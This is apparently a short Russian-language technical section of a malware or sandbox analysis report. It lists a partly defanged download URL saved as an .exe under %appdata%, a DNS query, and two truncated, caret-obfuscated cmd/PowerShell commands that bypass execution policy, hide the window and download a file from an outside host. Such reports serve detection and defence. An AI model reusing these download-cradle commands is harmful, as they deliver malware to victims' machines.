Техническая информация
- http://lt##.#ocalnews39.pl/file/set.rte как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^WeRShe^LL^.^eX^e^ ^-EXEcUt^IoN^P^ol^i^c^Y ^B^ypa^SS ^-N^OPR^OFIlE ^-^W^indOwsTy^lE ^H^i^dD^E^N (ne^W^-obJeC^t S^YS^t^e^m^.nE^T.W^EBCl^IENt^).D^O^wNlo^AdFiLE(^'http://lt##.#...
- DNS ASK lt##.#ocalnews39.pl
- '<SYSTEM32>\cmd.exe' /C "pO^WeRShe^LL^.^eX^e^ ^-EXEcUt^IoN^P^ol^i^c^Y ^B^ypa^SS ^-N^OPR^OFIlE ^-^W^indOwsTy^lE ^H^i^dD^E^N (ne^W^-obJeC^t S^YS^t^e^m^.nE^T.W^EBCl^IENt^).D^O^wNlo^AdFiLE(^'http://lt##.#...' (со скрытым окном)